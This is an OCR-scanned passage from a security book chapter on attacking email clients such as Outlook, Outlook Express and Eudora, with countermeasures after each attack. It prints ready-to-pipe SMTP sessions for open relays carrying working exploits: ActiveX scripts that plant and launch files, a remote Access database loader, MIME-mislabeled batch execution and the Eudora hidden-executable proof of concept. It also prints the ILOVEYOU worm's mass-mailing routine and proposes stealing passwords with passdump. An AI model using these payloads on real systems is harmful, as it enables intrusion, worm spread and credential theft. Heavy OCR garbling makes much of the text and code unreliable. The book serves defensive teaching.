difficult to send maliciously coded HTML using programs like Outlook and Outlook Ex- 
press (OE). Of course, UNIX users can use traditional command-line mail clients to per- 
form such manipulation. 

On Windows, our favorite mechanism is to manually send the message straight to an 
SMTP server via the command prompt. The best way to do this is to pipe a text file contain- 
ing the appropriate SMTP commands and data through netcat. Here's how it's done. 

Pirst, write the desired SMTP commands and message data to a file (call it malicia.txt). 
It's important to declare the correct Multi-Part Internet Mail Extension (MIME) syntax so 
that the email will be correctly formatted. T 5 ^icaUy, we will want to send these messages in 
HTML so that the body of the message itself becomes part of the malicious payload. The 
critical syntax is the three lines beginning with "MIME-Version: 1.0," as shown next: 

helo 

mail from: <mallory0malweary.com> 
rcpt to: <hapless0victim. net> 
data 

subject: Read this! 

Importance: high 
MIME-Version: 1.0 

Content-Type: text/html; charset=us-ascii 

Content-Transfer-Encoding: 7bit 

<HTML> 

<h2>Hello World! </h2> 

</HTML> 



quit 



Then tjipe this file at a command line and pipe the output through netcat, which should 
be pointed at an appropriate mail server's listening SMTP port 25, like so: 

type malicious.txt | nc -w mail.openrelay.net 25 



It goes without saying that malicious hackers will probably select an obscure mail server 
that offers unrestricted relay of SMTP messages and will take pains to obscure their own 
source IP address so that they are untraceable via the mail server's logs. 



TIP 



Such “open SMTP relays’’ are often abused by spammers and can be easily dug up on Usenet discus- 
sions or occasionally found at http://mail-abuse.org. 



Things get a little trickier if you also want to send an attachment with your HTML-for- 
matted message. You must add another MIME part to the message and encode the attach- 
ment in Base 64 per the MIME spec (RECs 2045-49). The best utility for performing this 
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automatically is mpack by John G. Myers, available at http:/ / www.21st-century.net/ 
Pub /Utilities /Archivers/. Mpack gracefully adds the appropriate MIME headers so that 
the output can be sent directly to an SMTP server. Here is an example of mpack encoding a 
file called plan! .fxf and oufpuffing if fo a file plan! .mim. The - s argumenf specifies fhe sub- 
jecf line of fhe message and is optional. 

mpack -s Nasty-gram -o plant . mim plant . txt 

Now fhe fricky parf . This MIME parf musf be inserfed info our existing HTML-formatted 
message. WeTl use fhe earlier example, malicia.fxf, and divide fhe message using cusfom 
MIME boundaries as defined on fhe "Confenf-Type:" lines. MIME boundaries are pre- 
ceded by double dashes, and fhe closing boundary is also suffixed wifh double dashes. 
Also nofe fhe nesting of a "mulfiparf/alfemafive" MIME parf (boundary2) so Ouflook re- 
cipienfs will correcfly decode our HTML message body. Pay careful attention fo place- 
menf of line breaks, as MIME can be inferprefed quife differenfly depending on fhe line 
breaks. Nofice fhaf fhe Imporfance of fhis message has been sef fo "high," jusf anofher 
piece of window dressing designed fo entice the victim. 

helo somedomain.com 

mail from: <mallory@malweary.com> 

rcpt to: <hapless@victim. net> 

data 

subject: Read this! 

Importance: high 
MIME -Version : 1.0 
Content-Type: multipart/raixed; 

boundary ="_boundaryl_" 



— _boundaryl_ 

Content-Type : multipart/alternative; 

boundary="_boundary2_" 



— _boundary2_ 

Content-Type: text/html; charset=us-ascii 
<HTML> 

<h2>Hello World! </h2> 

</HTML> 



— _boundary2_ — 



— _boundaryl. 
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Content-Type: application/octet-stream; name="plant . txt " 
Content-ID : <5551212> 

Content-Transfer-Encoding : base 6 4 

Content-Disposition: inline; f ilename="plant . txt " 
Content-MD5 : Psn+mc JEv0fPwoEc4OXYTA== 



SSB jb3VsZGEgaGE ja2VkIHlhIGJhZCANCg== 



— _boundaryl_ — 



quit 

Piping this through net cat to an open SMTP server will deliver an HTML-formatted 
message, with the file planf.txf attached, to hapless@victim.net. For a better under- 
standing of MIME boundaries in mulfipart messages, see RFC 2046 Section 5.1.1 at 
ftp://ftp.isi.edu/in-notes/rfc2046.txt. It might also be informative to examine a test 
message sent to Outlook Express. Click Properties I Details I Message Source to view 
the raw data. (Outlook won't let you see all the raw SMTP data.) 

Throughout this chapter, we'll refer to this method as a "mail hacking capsule." Let's 
apply this general technique to some specific affacks found in fhe wild fo demonsfrafe fhe 
risk level "mailicious" email acfually represenfs. 

Q Generic Mail Hacking Countermeasures 

Obviously, rendering of HTML mail should be disabled wifhin mail clienf software. Un- 
fortunately, this is difficult or impossible with most modern email clients. Additional 
web "features" that should definitely be disabled in email are mobile code technologies. 
We've already discussed how to do this in the section on security zones earlier, but we'll 
reiterate it here so the message sinks in. For both Microsoft Outlook and Outlook Express, 
set Zone under Secure Content to Restricted Sites under Tools I Options I Security, as 
shown in Figure 16-2. (Recall that these settings will not apply to web browsing with IE, 
which uses its own settings.) This single setting takes care of mosf of fhe problems identi- 
fied nexf. If is highly recommended. 

And, of course, safe handling of mail attachments is critical. Most people's first instinct 
is to blame the vendor for problems like fhe ILOVEYOU virus (which we will discuss 
shortly), but the reality is that almost all mail-borne malware requires some compliance 
on the part of fhe user. The Ouflook pafch available af hffp: / / office.microsoff.com / 
downloads/ 2000/ Ouf2ksec.aspx makes if even harder for users fo aufomafically launch 
atfachmenfs, forcing them to click through at least two dialog boxes before execufing an 
atfachmenf. (Coincidenfally, if also sets the security zone to Restricted Sites.) It isn't fool- 
proof, as we will see next, but it raises the bar significantly for would-be attackers. Raise 
fhe bar all fhe way by using good judgmenf: don'f open messages or download affach- 
menfs from people you don'f know! 






J 
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Executing Arbitrary Code Through Email 

The following attacks demonstrate many different mechanisms for executing commands 
on the victim's machine. Many of these are activated simply by opening the malicious 
message or previewing it in Outlook/OE's preview pane. 



Safe for Scripting” Mail Attacks 



Popularity: 


5 


Simplicity: 


6 


Impact: 


10 


Risk Rating: 


7 



Attacks don't get much more deadly than this: all the victim has to do is read the 
message (or view it in the preview pane if Outlook/OE is configured to do so). No inter- 
vention by the user is required. This wonderful nastiness is brought to you again by the 
Scriptlet.typelib ActiveX control that is marked "safe for scripting," as discussed in the 
previous section on ActiveX. Eyedog.ocx could just as easily be used, but this specific ex- 
ploit is based on Georgi Guninski's proof-of-concept code using Scriptlet.typelib at 
http:/ /www.guninski.com/scrtlb-desc.html. Here is a slightly modified version of his 
code pasted into a mail hacking capsule: 

helo somedomain . com 

mail from: <mallory0malweary . com> 

rcpt to: <hapless0victim.net> 

data 

subject: Ya gotta read this! 

MIME-Version : 1.0 

Content-Type : text/html; charset=us-ascii 
Content-Transfer-Encoding: 7bit 

If you have received this message in error, please delete it. 

<ob ject id="scr" classid="clsid: 06290BD5-48AA-llD2-8432-006008C3FBFC"> 

</ob ject> 

<SCRIPT> 
scr . Reset ( ) ; 

scr.Path="C:\\WIN98\\start menuWprogramsWstartupWguninski . hta" ; 

scr . Doc=" <ob ject id='wsh' classid='clsid :F935DC22-1CF0-11D0-ADB9- 

00C04FD58A0B ' ></ob ject><SCRIPT>alert ( ' Written by Georgi Guninski 

http : / /www . guninski . com ’ ) ; wsh . Run ( ’ c : \ \WIN98\ \command . com ’);</"+" SCRIP T> " ; 

scr . write ( ) ; 

</SCRIPT> 

</ob ject> 



quit 
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This code performs a two-step attack. First, it creates an HTML Application file (exten- 
sion .hta) in the user's Startup folder and writes the payload of the script to it. The cre- 
ation of the file occurs silently and almost invisibly to users as soon as they preview the 
message. (They might catch the disk-drive-activity light fluttering if they're watching ex- 
tremely closely.) Here's what our test message looks like in the user's inbox. (Outlook Ex- 
press is depicted here.) This is all that has to happen for the attack to be completed: 
viewing the message in the preview pane. 




The second step comes when the user inevitably reboots the machine. (The script 
could reboot the user's computer also, of course.) The .HTA file is executed at startup. 
(.HTA files are automatically interpreted by the Windows shell.) In our example, the user 
is greeted by the following pop-up message: 




This is quite a harmless action to have performed, out of an almost limitless range of pos- 
sibilities. The victim is completely at the mercy of the attacker here. 

The so-called KAK worm is based on exploitation of the Scriptlet vulnerability and may 
also be used to prey upon rmwary (and rmpatched) Outlook/ OE users. Eor more information 
on KAK, see http:/ / www.symantec.com/avcenter/venc /data/ wscript.kakworm.html. 
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O for Scripting” Countermeasures 

Obtain the patch for the Scriptlet/Eyedog ActiveX components, available at http: / / 
www.microsoft.com/ technet/security/bulletin/ms99-032.asp. 

It is important to note, once again, that this only corrects the problem with Scriptlet 
and Eyedog. Eor true security, disable ActiveX for mail readers, as discussed earlier in fhe 
secfion on securify zones. 

Executing MS Office Documents Using ActiveX 



Popularity: 


5 


Simplicity: 


5 


Impact: 


10 


Risk Rating: 


7 



Georgi Guninski didn'f stop when he exploited ActiveX fags embedded wifhin HTML 
email messages to load potentially dangerous ActiveX confrols. Subsequenf advisories 
posted to his site noted fhaf potentially dangerous Microsoff Office documenfs could also be 
laimched using fhe same technique. (Office docs behave much like ActiveX confrols fhem- 
selves.) These findings are covered af hffp:/ / www.guninski.com/sheefex-desc.hfml (for 
Excel and PowerPoinf documenfs) and hffp:/ / www.giminski.com/ access-desc.hfml (cov- 
ering launching of Visual Basic for Applications [VBA] code wifhin Access dafabases). 

We'll discuss fhe second of these findings here for fwo reasons. One, fhe Excel/ 
PowerPoinf issue is acfually more inferesfing for ifs abilify to wrife files surreptitiously fo 
disk, which we discuss in an upcoming secfion. Second, fhe Access-based vulnerabilify is 
more severe in fhe opinion of many in fhe securify communify because if circumvents any 
security mechanisms applied to ActiveX by the user. Thaf's righf, even if ActiveX is com- 
plefely disabled, you are still vulnerable. The severify of fhis problem was judged fo be so 
greaf by fhe SANS Insfifufe fhaf fhey termed if "probably fhe mosf dangerous program- 
ming error in Windows worksfafion (all varieties — 95, 98, 2000, NT 4.0) fhaf Microsoff 
has made" (see hffp: / / www.sans.org/ newlook/ resources / win_flaw.hfm). The sad parf 
is, fhis seeming sensafionalism may be on fargef . 

The problem lies in fhe checks fhaf Windows performs when an Access file (.MDB) is 
loaded wifhin IE from an objecf fag, as shown in fhis snippef of HTML proposed by 
Georgi Guninski: 

<0BJECT data="db3 .mdb" id="dl "></0BJECT> 

As soon as IE encounfers fhe objecf fag, if downloads fhe Access dafabase specified in 
fhe "dafa=" parameter, and fhen calls Access fo open if. If does fhis before warning fhe 
user abouf fhe pofenfial for any damage caused by rurming fhe dafabase. Thus, fhe dafa- 
base launches whefher lE/Ouflook/OE has been configured fo execufe AcfiveX confrols 
or nof. Ugh. 
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Georgi's exploit relies on a remote file hosted by his web site called db3.mdb. It is an 
Access database containing a single form fhaf launches Wordpad. Here is anofher mail 
hacking capsule demonsfrafing how fhis attack would be carried ouf in pracfice: 

helo somedomain.com 

mail from: <mallorY0attack . net> 

rcpt to: <hapless@victim. net> 

data 

subject: And another thing! 

Importance: high 
MIME -Version : 1.0 

Content-Type: text/html; charset=us-ascii 
<HTML> 

<h2>Enticing message here!</h2> 

<0B JECT data="http : / /www . guninski . com/ db3 . mdb" id="dl "></0B JECT> 

</HTML> 



quit 

We have provided an explicif URL reference in fhis example fo Georgi's db3.mdb file 
so fhaf if will work via email (see fhe line in fhe previous code listing fhaf confains fhe 
URL hffp://www.guninski.com/db3.mdb). SANS claimed fo have used an SMB share 
over fhe Infemef fo gef fhe Access file. The mind boggles — ^how many FTP servers do you 
know abouf fhaf permif unsupervised pufs and gefs? We discuss ofher reposifories fhaf 
could be used by attackers nexf. 

The key poinf here is fhaf by rendering fhis simple fag, IE/ Ouflook/OE downloads 
and launches a file confaining a powerful VBA macro wifhouf any user inpuf. Is anyone 
not scared by fhis? 

Q Countermeasure: Define an Access Admin Password 

Disabling ActiveX will nof stop fhis Access exploif, so if musf be pafched according fo fhe in- 
sfrucfions foimd af hffp://www.microsoff.com/fechnef/securify/bulletin/MS00-049.asp. 
We draw parficular affenfion fo fhe pafch specifically for fhe Access-relafed issue. 
(Microsoff calls if fhe "IE Scrip!" vulnerabilify.) The pafch can be found af hffp: / / 
www.microsoff.com/windows/ ie/ download/ crifical/pafchll.hfm. 

Microsoff recommended a work-around fhaf is also good fo apply whefher fhe pafch 
is applied or nof. The work-around is fo sef an Admin password for Access (by defaulf if 
is blank), as follows: 

1. Sfarf Access 2000 buf don'f open any dafabases. 

2. Ghoose Tools I Securify. 

3. Selecf User And Group Accounfs. 
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4. Select the Admin user, which should be defined by default. 

5. Go to the Change Logon Password tab. 

6. The Admin password should be blank if if has never been changed. 

7. Assign a password fo fhe Admin user. 

8. Click OK fo exif fhe menu. 

This should prevenf rogue VBA code from rurming wifh full privileges. SANS also 
nofes fhaf blocking oufgoing Windows file sharing af fhe firewall (TCP 139 and TCP 445) 
will reduce fhe possibilify of users being fricked info launching remofe code. 

Executing Files Using a Nonzero ActiveX CLSID Parameter 



Popularity: 


5 


Simplicity: 


5 


Impact: 


10 


Risk Rating: 


7 



The basis of fhis vulnerabilify was an almosf offhand remark in a Bugfraq fhread 
(hffp://www.securifyfocus.com/bugtraq/archive) concerning fhe malware.com "force 
feeding" vulnerabilify (see nexf). Weld Pond, hacker extraordinaire of fhe LOphf and 
net cat NT fame (Chapfer 5), chimed in on behalf of his colleague DilDog, of Culf of fhe 
Dead Cow and Back Orifice 2000 fame (Chapfers 4 and 14), fo provide a mechanism for 
execufing files force-fed fo users via fhe malware.com fechnique. By configuring an 
ActiveX OBJECT fag wifh a nonzero CLSID paramefer info fhe body of a malicious email 
message, any file on disk can be execufed. This frighfening proposal makes any execuf- 
able on fhe user's disk a pofenfial fargef. Here's a sample mail hacking capsule: 

helo somedomain.com 

mail from: <mallory@attack . net> 

rcpt to: <hapless0victim. net> 

data 

subject: Read this! 

Importance: high 
MIME -Version : 1.0 

Content-Type: text/html; charset=us-ascii 

<HTML> 

<HEAD> 

</HEAD> 

<B0DY> 

<0BJECT CLASSID=' CLSID : 10000000-0000-0000-0000-000000000000 ' 

C0DEBASE= ' c : \windows \calc . exe ' ></0B JECT> 
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</BODYX/HTML> 



quit 

Note the nonzero CLSID parameter. This is what makes the exploit tick. The file to be 
executed is simply listed in the CODEBASE parameter. 

However, in our testing, we noted that several planets had to be in alignment for this 
to work. Primarily, on Outlook Express 5.00.2615.200, we had to set the security zone to 
Low, and we were still prompted with a dialog box to execute an unsigned control when 
we tried to launch calc.exe in the System folder. Users would have fo be pretty clueless fo 
fall for this one, but it's an intriguing start, especially when taken together with the capa- 
bility to write files to disk as supplied by malware.com. 

Q Nonzero CODEBASE Countermeasure 

Based on our testing, setting security zones to an appropriate level takes care of this prob- 
lem. (See the discussion of security zones earlier.) 



9 Outlook/OE Date Field Buffer Overflow 



Popularity: 


7 


Simplicity: 


9 


Impact: 


10 


Risk Rating: 


9 



Does it seem that ActiveX lies at the heart of mosf of fhese exploifs? On July 18, 2000, a 
differenf sort of Ouflook/OE vulnerabilify was armounced fhaf didn'f have anything to 
do with ActiveX. 

This problem was a classic buffer overflow issue caused by sfuffing fhe GMT section 
of fhe dafe field in the header of an email wifh an unexpectedly large amount of data. 
When such a message is downloaded via POPS or 1MAP4, the lNCETCOMM.DLL file re- 
sponsible for parsing the GMT token does not perform proper bounds checking, causing 
Ouflook/OE fo crash and making arbitrary code execution possible. Sample exploit code 
based on that posted to Bugtraq is shown next: 

Date: Tue, 18 July 2000 14:16:06 +<approx. 1000 bytesxassembly code to execute> 

As we have explained many times in this book, once the execution of arbifrary com- 
mands is achieved, fhe game is over. A "maiUcious" message could silently install Trojans, 
spread worms, compromise the target system, larmch an attachment — ^practically anything. 

OE users would merely have to open a folder confaining a malicious email in order fo 
become vulnerable, and f 5 qiically fhe acf of simply downloading such a message while 
checking mail would cause fhe crash/overflow. OE users are fhen kind of sfuck — the 



668 



Hacking Exposed: Network Security Secrets and Solutions 



message never successfully downloads, and the exploit will crash the program on every 
subsequent attempt to retrieve mail. One work-around is to use a non-Outlook/OE mail 
client to retrieve the mail and delete it (assuming you can tell which messages are the 
right ones. . .). Netscape Messenger does a handy job of this, displaying the date field in 
the preview pane to indicate which are the offending messages. Outlook users are vulner- 
able if they preview, read, reply, or forward an offending message. 

Initially, exploit code was posted to Bugtraq, until it was later revealed that this exam- 
ple was hard-coded to work against a server on a private LAN, and thus would not func- 
tion when mailed to Intemet-cormected users. It seems the post was made mistakenly by 
Aaron Drew, who apparently was attempting to use a technique similar to the mail hack- 
ing capsule we've outlined in this chapter when he inadvertently sent a message to 
Bugtraq instead. For the record, such a message would look something like the following. 
(Note the Date line — the overflow has been omitted for brevity, enclosed here by square 
brackets that are not necessary in the actual exploit.) 

helo somedomain . com 

mail from: <mallory0attack . net> 

rcpt to: <hapless0victim.net> 

data 

Date: Sun, 7 May 2000 11:20:46 +[~1000bytes + exploit code in hex or ascii] 
Subject: Date overflow! 

Importance: high 
MIME-Version : 1.0 

Content-Type : text/plain; charset=us-ascii 

This is a test of the Outlook/OE date field overflow. 



quit 

Underground Security Systems Research (USSR, http://www.ussrback.com) also 
claimed credit for discovering this flaw (or at least hearing about it from a hacker named 
Metatron),but said they waited until Microsoft had prepared a patch before going public. 
USSR posted their exploit, which opened up a connection to their web site. It can be exe- 
cuted in almost exactly the same way as shown earlier. 

Q Countermeasure for Date Field Overflow 

According to the bulletin posted by Microsoft at http:/ / www.microsoft.com/technet/ 
security/bulletin/MS00-043.asp, the vulnerability can be patched by installing the fix at 
http: / / www.microsoft.com / windows /ie/ download / critical/ patch9.htm. 

It can also be eliminated by a default installation of either of the following upgrades: 

T Internet Explorer 5.01 Service Pack 1 
■ Internet Explorer 5.5 on any system except Windows 2000 

A Windows 2000 users must revert back to 5.01, apply the patch, and then 
upgrade to 5.5. Windows System File Protection (SEP) prevents wab32.dll 
from updating in the IE 5.5 patch on Win2K. 
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A nondefault installation of these upgrades will also eliminate this vulnerability, as 
long as an installation method is chosen that installs upgraded Outlook Express compo- 
nents. (The user should be prompted about this during installation.) 




When installed on a Windows 2000 machine, IE 5.5 does not install upgraded Outlook Express com- 
ponents and, therefore, does not eliminate the vulnerability. 



Also note that Microsoft stated that Outlook users who have configured Outlook to 
use only MAPI services would not be affected, regardless of what version of Internet Ex- 
plorer they have installed. INETCOMM.DLL is not used when Internet E-mail services is 
not installed under Tools I Services. 

^^IVIIME Execution 



Popularity: 


6 


Simplicity: 


8 


Impact: 


10 


Risk Rating: 


8 



Noted IE security analyst Juan Carlos Garcia Cuartango found this issue, which lever- 
ages a combination of weird email attachment behavior and the ever-versatile lERAME 
HTML tag. A similar use of lERAME to execute email attachments using their MIME 
Content-ID was demonstrated by Georgi Guninski in his advisory #9 of 2000, discussed 
previously. Juan Garlos' contribution this time around was the discovery that executable 
file types can be automatically executed within IE or HTML email messages if they are 
mislabeled as the incorrect MIME ty^e. Even worse, this mislabeling probably evades 
mail content filters. 

Juan Garlos provides three examples of this technique on his web site, http:/ / 
www.kriptopolis.com. Here is one variation that disguises a batch file called hello.bat as 
an audio file. We have modified Juan Carlos' code to fit it within a mail hacking capsule 
suitable for forwarding to an SMTP server. 

helo somedomain.com 

mail from: mallory0attacker.com 

rcpt to: hapless0victim.net 

data 

Subject: Is Your Outlook Configured Securely? 

Date: Thu, 2 Nov 2000 13:27:33 +0100 

MIME -Version : 1.0 

Content-Type : multipart/ related; 

type="multipart/alternative" ; 
boundary=" 1 " 

X-Priority: 3 
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X-MSMail-Priority: High 
X-Unsent : 1 

— 1 

Content-Type : multipart/alternative; 
boundary="2 " 



— 2 

Content-Type: text/html; 

charset=" iso-8859-1" 

Content-Transfer-Encoding : quoted-printable 

<HTML> 

<HEAD> 

</HEAD> 

<BODY bgColor=3D#f f f f f f > 

<iframe src=3Dcid: THE-CID height=3D0 width=3D0></iframe> 

If secure, you will get prompted for file download now. Cancel. <BR> 
If not, I will now execute some commands ... <BR> 

</BODY> 

</HTML> 

— 2 — 

— 1 

Content-Type: audio/x-wav; 
name=" hello . bat " 

Content-Transfer-Encoding : quoted-printable 

Content-ID : <THE-CID> 

echo OEE 
dir C:\ 

echo YOUR SYSTEM HAS A VULNERABILITY 
pause 



— 1 



quit 
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Note the Content-ID of the MIME part with boundary =1 in the preceding listing: 
<THE-CID>. This Content-ID is referenced by an IFRAME embedded wifhin fhe main 
body of fhe message (MIME parf 2). (Each of fhese lines is bolded for reference.) When 
fhis message is previewed wifhin Ouflook/OE, fhe lERAME is rendered and execufes fhe 
MIME parf specified, which confains some simple bafch scrip! fhaf echoes a warning fo 
fhe console, as in fhe illusfrafion shown nexf. 



I C:\WINNT\System32\cmd.eKe 



C:\Documents and Settings\fldtninistrator>echo OFF _ 
Volume in drive C has no label. 

Volume Serial Number is 9498-F822 



Directory 


of C:\ 






04/17/2001 


03:16a 




620 ’test! 


04/08/2001 


05:46p 


<DIR> 


Documents an 


04/08/2001 


02:59p 


<DIR> 


Inetpub 


04/17/2001 


03:11a 


<DIR> 


Program File 


04/17/2001 


03:14a 


<DIR> 


test 


04/16/2001 


09:43p 


<DIR> 


WINNT 




1 Filets 




620 bytes 



5 Dir(s) 44,689,059,840 bytes free 
VOUR SVSTEH HAS R VULNERRBILITV 
Press any key to continue 






Juan Carlos provides Win32 executable and VBS examples of this same exploit on his 
site. Creating these is as simple as inserting the appropriate code within the MIME part 
specified by <THE-CID>. 

This attack could also be implemented by hosting a malicious web page. In either 
case, it is clearly a very severe vulnerability, since it allows the attackers to run code of 
their choice on the victim's system by simply sending him or her an email. 

An interesting payload to consider for an attack like this is the tool passdump by 
janker (http: / / www.hackersclub.com/km/files /hfiles/). Passdump reads the currently 
logged-on Windows user password from memory and writes it to %systemroot%\ 
pass.txt. Juan Carlos' exploit could be used to execute the passdump as a MIME attach- 
ment, and then one of the other exploits in this chapter could read the pass.txt file and 
email it to a remote attacker using techniques like Outlook address book worms. (See the 
next section.) Imagine legions of Internet users unknowingly sending out their pass- 
words day after day. . . 

Q Countermeasures for MIME Execution 

The short-term cure for this issue is to obtain the patch from Microsoft bulletin MSOl-020, 
which fixes the way IE handles certain imusual MIME t 5 y>es when embedded in HTML. 
This changes the behavior of IE from automatically launching these MIME types in attach- 
ments to prompting for file download instead. This vulnerability is cataloged as Bugtraq ID 
2524 (http:/ / www.securityfocus.com/bid/2524) and is fixed in Win 2000 Service Pack 2. 
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Long-term prevention for issues involving automatic execution is to configure Ouf- 
look/OE fo read email as securely as possible. Specifically, if File Download is disabled for 
fhe securify zone in which email is read, fhis exploif cannof occur. IE securify zones were 
discussed previously imder "Using Securify Zones Wisely: A General Solution fo fhe Chal- 
lenge of ActiveX." 

/ 

^udora Hidden Attachment Execution Vulnerability 



Popularity: 


6 


Simplicity: 


8 


Impact: 


10 


Risk Rating: 


8 



We've covered a lof of Microsoff clienf vulnerabilities in fhis chapfer, buf Microsoff is 
far from fhe only company fo suffer from clienf -side securify exposures. Qualcomm's 
popular Eudora email clienf for Windows confains a vulnerabilify idenfified by fhe folks 
af malware.com fhaf makes if possible for an attacker fo execufe arbifrary code on a re- 
mofe sysfem. Exploifafion requires no user inferacfion beyond launching Eudora and 
downloading email, assuming fhe following configuration (on fhe freeware version of 
Eudora 5.0.2 running on Win 9x, NT 4, or 2000): 

T The preview pane is enabled. If fhe preview pane is nof enabled, a user has 
fo open fhe mail message fo cause fhe code fo execufe. 

A The Use Microsoft's Viewer option is enabled under Tools I Options I 
Viewing Mail. The firsf of fhese options is enabled by defaulf. (Confrary fo 
some early armouncemenfs, fhe Allow Execufables In HTML Confenf option 
does nof have fo be enabled for fhis fo be exploifed.) 

This vulnerabilify arises from fhe way Eudora embeds files in HTML email messages 
(for example, inline images). They are sfored in a special directory, referred fo as fhe "em- 
bedded folder." The HTML email can fhen reference fhese files using fheir MIME Con- 
fenf IDs (CIDs) as parf of fhe URL wifh fhe fag "cid:confenf-id." 

Therefore, if an attacker consfrucfs an HTML email message wifh fwo affachmenfs 
embedded in fhe message, and wifh a single reference fo fhe CID of one of fhe affach- 
menfs in fhe body of fhe message, fhey can be executed on fhe clienf sysfem. The inline 
reference calls fhe firsf HTML affachmenf, which confains JavaScripf fhaf insfanfiafes fhe 
second as an AcfiveX objecf and executes if. 

The following proof-of-concepf code from http://www.malware.com/youlDORA.fxf 
demonsfrafes fhe vulnerabilify. (We have edited fhe Base 64-encoded confenf for brevify.) 

MIME -Version : 1.0 
To: hapless@victim.com 
Subject: YOU! DORA 
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Content-Type : multipart/ related; 
boundary="-CF416DC77A62458520258885" 

-CF416DC77A62 458520258885 

Content-Type: text/html; charset=us-ascii 
Content-Transfer-Encoding: 7bit 

<!doctype html public "-//w3c//dtd html 3.2//en"> 

<html> 

<head> 

<title>YOU!DORA</title> 

</head> 

<body bgcolor="#0000ff " text="#000000" link="#0000f f " 
vlink=" #800080" alink=" #f f 0000 " > 

<br> 

<br> 

<img SRC="cid : mr . malware . to . you" style="display : none " > 

<img id=W0W src="cid:malware . com" style="display : none"> 
<centerxh6>YOU ! DORA</h6></center> 

<IFRAME id=malware width=10 height=10 style="display : none 
<script> 

// 18.03.01 http://www.malware.com 
malware . location . href=W0W . src 

</ script> 

</body> 

</html> 

-CE416DC77A62 458520258885 
Content-Type : application/ octet-stream 
Content-ID : <mr . malware . to . you> 

Content-Transfer-Encoding : base 6 4 

Content-Disposition: inline; filename= "malware . Gxe" 

[base64-encoded attachment "malware.exe"] 

-CE416DC77A62 458520258885 

Content-Type: application/octet-stream; charset=iso-8859-l 
Content-ID : <malware . com> 

Content-Transfer-Encoding : base 6 4 

Content-Disposition: inline; filename=" You ! DORA. html" 

[base64-encoded attachment "YoulDORA.html"] 

-CE416DC77A62 458520258885 — 



></IERAME> 
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When the Eudora client receives this message, it transfers the two files YoulDORA.hfml 
and malware.exe fo fhe embedded folder, fhe normal behavior for inline MIME affach- 
menfs. The locafion.href JavaScripf in fhe body of fhe message fhen calls fhe Confenf ID of 
YoulDORA.hfml, which, in fum, execufes malware.exe via JavaScripf embedded wifhin 
ifs own HTML. Alfhough if is Base 64-encoded in fhe original message, here is whaf 
YoulDora.hfml looks like in ASCII: 

<script> 

// http://www.malware.com - 18.03.01 

document . writeln (' <IFRAME ID=runnerwin WIDTH=0 HEIGHT=0 
SRC="about :blank"x/IFRAME> ' ) ; 
function linkit ( filename ) 

{ 

strpagestart = "<HTML><HEAD></HEADXBODY><OBJECT CLASSID=" + 

" 'CLSID: 15589FA1-C456-11CE-BF01-00AA0055595A' C0DEBASE= ' " ; 
strpageend = " ' x/OBJECTx/BODYx/HTML>" ; 
runnerwin . document . open ( ) ; 

runnerwin . document . write ( strpagestart + filename t strpageend); 

} 

linkit ( ' malware . exe ' ) ; 

</ script> 

As you can see here, fhe file malware.exe is aufomafically execufed using fhe "linkif" rou- 
tine, which puts filename info HTML confenf and spews if info fhe lERAME. (More informa- 
tion on aufomafically executing files by h 5 ^erlrnk, including fhe sample code on which fhis 
is based, can be found in KB Article Q232077 af hffp:/ / supporf.microsoff.com/supporf/ 
kb/arficles/Q232/0/77.ASP.) 

The ulfimafe oufcome here, as infended, is fhe fransparenf, automatic execution of 
malware.exe wifh no user infervenfion, simply by previewing fhe incoming mail mes- 
sage. Malware.exe runs a full-screen command shell wifh an image of fanning flames — a 
bif over fhe fop, buf cerfainly nof as bad as if could've been. 

Q Eudora Hidden Attachment Countermeasures 

The besf counfermeasure for fhis issue is probably fo upgrade fo Eudora 5.1, available for 
free download from hffp://www.eudora.com. A work-around is fo disable fhe Use 
Microsoff's Viewer opfion under Tools I Options I Viewing Mail. Also, disabling 
JavaScripf and AcfiveX wifhin IE would debilifafe fhis affack. (See fhe previous discus- 
sion enfifled "Using Securify Zones Wisely.") This vulnerabilify is cafaloged as Bugfraq 
ID 2490 af hffp:/ /www.securifyfocus.com/bid/2490. 

Outlook Address Book Worms 

During fhe lasf years of fhe 20* cenfury, fhe world's malicious code jockeys fhrew a wild 
New Year's parfy af fhe expense of Ouflook and Ouflook Express users. A whole slew of 
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worms was released that was based on an elegant technique for self-perpetuation: by 
mailing itself fo every enfry in each vicfim's personal address book, fhe worm masquer- 
aded as originating from a frusfed source. This little piece of social engineering (see 
Chapfer 14) was a frue sfroke of genius. Corporations fhaf had fens of fhousands of users 
on Ouflook were forced fo shuf down mail servers fo friage fhe influx of messages zip- 
ping back and forfh between users, clogging mailboxes and sfraining mail server disk 
space. Who could resisf opening affachmenfs from someone fhey knew and frusfed? 

The firsf such email missile was called Melissa. Though David L. Smifh, fhe aufhor of 
Melissa, was caughf and evenfually pleaded guilfy fo a second-degree charge of compufer 
fheff fhaf carried a five- fo fen-year prison ferm and up fo a $150,000 fine, people kepf 
spreading one-offs for years. Such household names as Worm.Explore.Zip, BubbleBoy, 
and ILOVEYOU made fhe rormds until fhe media seemed fo gef fired of sensationalizing 
fhese exploifs lafe in 2000. The fhreaf sfiU persisfs, however, and if is one fhaf needs fo be 
highlighfed. 



^ Vhe ILOVEYOU Worm 



Popularity: 


5 


Simplicity: 


5 


Impact: 


10 


Risk Rating: 


7 



Here is fhe perfinenf Visual Basic Scrip! language (VBScripf) subroutine from fhe 
ILOVEYOU worm fhaf caused if fo spread via email. (Some lines have been manually 
broken fo fif fhe page.) 

sub spreadtoemail () 

On Error Resume Next 

dim X, a, ctrlists, ctrentries , male ad, b, regedit , regv, regad 

set regedit=CreateOb ject ( "WScript .Shell" ) 

set out=WScript . Great eOb ject ( "Outlook .Application" ) 

set mapi=out . GetNameSpace ( "MAPI" ) 

for ctrlists=l to mapi . AddressLists . Count 

set a=mapi .AddressLists (ctrlists) 

x=l 

regv=regedit . RegRead ( "HKEY_CURRENT_USER\Software\Microsoft\WAB\ " &a) 
if (regv="") then 
regv=l 
end if 

if (int (a .AddressEntries . Count ) >int (regv) ) then 
for ctrentries=l to a .AddressEntries . Count 
malead=a . AddressEntries (x) 
regad=" " 

regad=regedit . RegRead ( "HKEY_CURRENT_USER\Software\Microsoft\WAB\ " &malead) 
if (regad="") then 
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set male=out . Createltem (0) 
male . Recipients .Add (malead) 
male. Subject = "ILOVEYOU" 

male. Body = vbcrlfs "kindly check the attached LOVELETTER coming from me." 
male .Attachments .Add (dirsystem& " \LOVE-LETTER-FOR-YOU . TXT . vbs " ) 
male . Send 

regedit .RegWrite "HKEY_CURRENT_USER\Software 

\Microsoft\WAB\"&malead, 1, "REG_DWORD" 

end if 

x=x+l 

next 

regedit . RegWrite 

